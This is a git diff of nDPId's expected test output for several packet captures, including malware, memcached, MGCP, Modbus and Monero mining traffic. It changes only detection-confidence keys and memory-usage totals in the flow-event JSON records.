-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} -00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} +00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":6587,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":4,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1569579417280} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 26/26 @@ -37,9 +37,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5913781 bytes -~~ total memory freed........: 5913781 bytes -~~ total allocations/frees...: 118219/118219 +~~ total memory allocated....: 6047415 bytes +~~ total memory freed........: 6047415 bytes +~~ total allocations/frees...: 120981/120981 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 2467 chars diff --git a/test/results/memcached.cap.out b/test/results/memcached.cap.out index 39f33e614..4f8a5534d 100644 --- a/test/results/memcached.cap.out +++ b/test/results/memcached.cap.out @@ -4,8 +4,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":1035,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1534343745954} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871781 bytes -~~ total memory freed........: 5871781 bytes -~~ total allocations/frees...: 118125/118125 +~~ total memory allocated....: 6005415 bytes +~~ total memory freed........: 6005415 bytes +~~ total allocations/frees...: 120887/120887 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 688 chars diff --git a/test/results/mgcp.pcapng.out b/test/results/mgcp.pcapng.out index a40c20bd6..017be90ad 100644 --- a/test/results/mgcp.pcapng.out +++ b/test/results/mgcp.pcapng.out @@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1463066849887} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463066849887,"flow_last_seen":1463066849887,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463066849887,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1463066849887,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1463066849887,"pkt":"AFBWWvA7AAtFuLlqCABFaABPAQAAAP4RztYKCuRICgr0Agl7CXsAO7a8UlNJUCAyNjI2NjIxMzQgKkB2ZzIyNCBNR0NQIDAuMQpSTTogZ3JhY2VmdWwKUkQ6IDAK"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463066849887,"flow_last_seen":1463066849887,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463066849887,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463066849887,"flow_last_seen":1463066849887,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463066849887,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1463066849888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":57,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":57,"pkt_l4_len":23,"thread_ts_msec":1463066849888,"pkt":"AAtFuLlqAFBWWvA7CABFYAArAABAAEARTgMKCvQCCgrkSAl7CXsAF5QpMjAwIDI2MjY2MjEzNCAK"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1463066853411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1463066853411,"pkt":"AFBWWvA7AAtFuLlqCABFaABIAAAAAP4Rz90KCuRICgr0Agl7CXsANBfXUlNJUCAyNjI2NjIxMzYgKkB2ZzIyNCBNR0NQIDAuMQpSTTogcmVzdGFydAo="} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1463066849887,"flow_last_seen":1463066856144,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":1160,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1463066856144,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1463066849887,"flow_last_seen":1463066856144,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":1160,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1463066856144,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"mgcp.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":1160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1463066856144} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869791 bytes -~~ total memory freed........: 5869791 bytes -~~ total allocations/frees...: 118126/118126 +~~ total memory allocated....: 6003425 bytes +~~ total memory freed........: 6003425 bytes +~~ total allocations/frees...: 120888/120888 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 680 chars diff --git a/test/results/modbus.pcap.out b/test/results/modbus.pcap.out index 93c7a4d58..ac75a6472 100644 --- a/test/results/modbus.pcap.out +++ b/test/results/modbus.pcap.out @@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1223541953927} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7580000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7580000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":102,"total-skipped-flows":0,"total-l4-payload-len":1173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1223541977037} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 102/102 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872401 bytes -~~ total memory freed........: 5872401 bytes -~~ total allocations/frees...: 118216/118216 +~~ total memory allocated....: 6006035 bytes +~~ total memory freed........: 6006035 bytes +~~ total allocations/frees...: 120978/120978 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 695 chars diff --git a/test/results/monero.pcap.out b/test/results/monero.pcap.out index f227900b7..4f9408496 100644 --- a/test/results/monero.pcap.out +++ b/test/results/monero.pcap.out @@ -4,15 +4,15 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 